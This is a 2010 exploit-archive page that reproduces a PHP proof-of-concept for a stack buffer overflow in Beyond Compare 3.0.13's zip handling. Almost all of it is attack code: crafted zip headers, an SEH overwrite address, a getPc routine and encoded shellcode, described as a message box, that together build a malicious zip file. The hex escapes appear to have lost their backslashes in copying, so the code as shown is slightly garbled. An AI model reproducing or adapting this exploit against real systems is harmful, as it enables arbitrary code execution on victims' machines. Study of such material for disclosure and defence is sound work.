Home / os / win7

Beyond Compare 3.0.13 b9599 (.zip) 0day Stack Buffer Overflo

Posted on 04 May 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Beyond Compare 3.0.13 b9599 (.zip) 0day Stack Buffer Overflow</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=========================================================================
Beyond Compare 3.0.13 b9599 (.zip) 0day Stack Buffer Overflow PoC exploit
=========================================================================


&lt;?php
/********************************************************************************
Beyond Compare 3.0.13 b9599 (.zip) 0day Stack Buffer Overflow PoC exploit
Author: mr_me - http://net-ninja.net/
Download: http://es.kioskea.net/remote/download_get.php?ID=2321
Platform: Windows XP sp3
Advisory: http://www.corelan.be:8800/advisories.php?id=10-036
Patched in latest version and previous versions
Greetz to: Corelan Security Team
http://www.corelan.be:8800/index.php/security/corelan-team-members/
Thanks to rick2600 and corelanc0d3r for the getPc !
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Script provided 'as is', without any warranty.
Use for educational purposes only.
Do not use this code to do anything illegal !
  
Note : you are not allowed to edit/modify this code.
If you do, Corelan cannot be held responsible for any damages this may cause.
********************************************************************************/
 
echo &quot;
|------------------------------------------------------------------|
|                         __               __                      |
|   _________  ________  / /___ _____     / /____  ____ _____ ___  |
|  / ___/ __ / ___/ _ / / __ `/ __    / __/ _ / __ `/ __ `__  |
| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |
| \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |
|                                                                  |
|                                       http://www.corelan.be:8800 |
|                                              security@corelan.be |
|                                                                  |
|-------------------------------------------------[ EIP Hunters ]--|
~~&gt; Beyond compare 3.0.13 b9599 (.zip) BOF PoC exploit &lt;~~
&quot;;
 
// local file header
$lf_header = &quot;x50x4Bx03x04x14x00x00x00x00x00xB7xACxCE&quot;.
&quot;x34x00x00x00x00x00x00x00x00x00x00x00x00x14x08x00x00&quot;;
  
// central directory file header
$cdf_header = &quot;x50x4Bx01x02x14x00x14x00x00x00x00x00xB7&quot;.
&quot;xACxCEx34x00x00x00x00x00x00x00x00x00x00x00x00x14x08&quot;.
&quot;x00x00x00x00x00x00x01x00x24x00x00x00x00x00x00x00&quot;;
  
// end of central directory record
$efcdr_record = &quot;x50x4Bx05x06x00x00x00x00x01x00x01x00&quot;.
&quot;x42x08x00x00x32x08x00x00x00x00&quot;;
 
// corelan security team - msgbox
$sc = &quot;VYhffffk4diFkDql02Dqm0D1CuEE5n3l0G3j3C0S1p02024B0W3y2G2u4D0k4q3c&quot;.
&quot;0615092E0T0H0l4s4u1k0A2p3G0Y3W3A0u2K2J0P2o4E3U2L370w3N5O3h2p1O2w1o3v4&quot;.
&quot;T3P4n1K3v4n0z3Y0S0M2k5L4J0m4Y2D103V2s4K4t0Q0U0P7o2L4P2O8K3r0j0y0N0s37&quot;.
&quot;2l0m5K0Y8M0S5p4V110Q2J182s7M2K344J3j04VYVTX10X41PZ41H4A4I1TA71TADVTZ3&quot;.
&quot;2PZNBFZDQC02DQD0D13DJEON4F1W9M490R0P08654E2M9Y2F64346K5K450115MN2G0N0&quot;.
&quot;B0L5C5DKO106737KO9W8P0O2L1L0P184E3U0Q8P1G3L5O9R601E671O9W343QOO113RJO&quot;.
&quot;LK8M640M1K3WOL1W4Y2O613V2I4K5C0R0S0PMO2O3W2O8K9R1Z1K0S1H3PLMKM5KKK8M0&quot;.
&quot;S4JJL15612J1267KM2K4D903K03VVYA4444444444QATAXAZAPA3QADAZABARALAYAIAQ&quot;.
&quot;AIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYA&quot;.
&quot;ZBABABABAB30APB944JB9K7YMY7Y7O1SKWKQ0X6QLT8Y2TMTJT1K3S7SKT013KLUKS3KL&quot;.
&quot;U3QJR1Y04MT4S1Y6L9UKTLX0I1P096TJPML5N0E5K4O6LMP07MW038R9WJT9K0J4M5NOK&quot;.
&quot;KKMS3N0L4L8S1N8NLW11JV1V6YKO1SMO1P2OMNKOMK4N8QOO0KKR104POLLZ3XLWJXML6&quot;.
&quot;SKN03MQMK0GMQ1ZLZ8K6Y4LKPA&quot;;
  
/*
Corelan's - getPc routine
0424F020   EB 05            JMP SHORT 0424F027
0424F022   5E               POP ESI
0424F023   41               INC ECX
0424F024   FFD6             CALL ESI
0424F026   41               INC ECX
0424F027   E8 F6FFFFFF      CALL 0424F022
*/
 
// ascii armoured &amp; mangled
$getPc = &quot;x89x05x5ex41x98x99x41x8ax94x98x98x98&quot;;
$sEh = &quot;x0dx05x01x10&quot;; // add esp, 8; retn --&gt; 7zxa.dll
$trigger = &quot;x3a&quot;;
 
// build the PoC
$junk = str_repeat(&quot;x41&quot;, 2064).&quot;x2ex74x78x74&quot;;
$lol = str_repeat(&quot;x41&quot;, 223).&quot;x41x73x06x41&quot;.$sEh.$getPc.$sc;
$lol .= str_repeat(&quot;x41&quot;,2062-strlen($lol)).$trigger.&quot;x2ex74x78x74&quot;;
$_____boooom = $lf_header.$junk.$cdf_header.$lol.$efcdr_record;
file_put_contents(&quot;cst-beyondcompare.zip&quot;,$_____boooom);
?&gt;


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-04]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :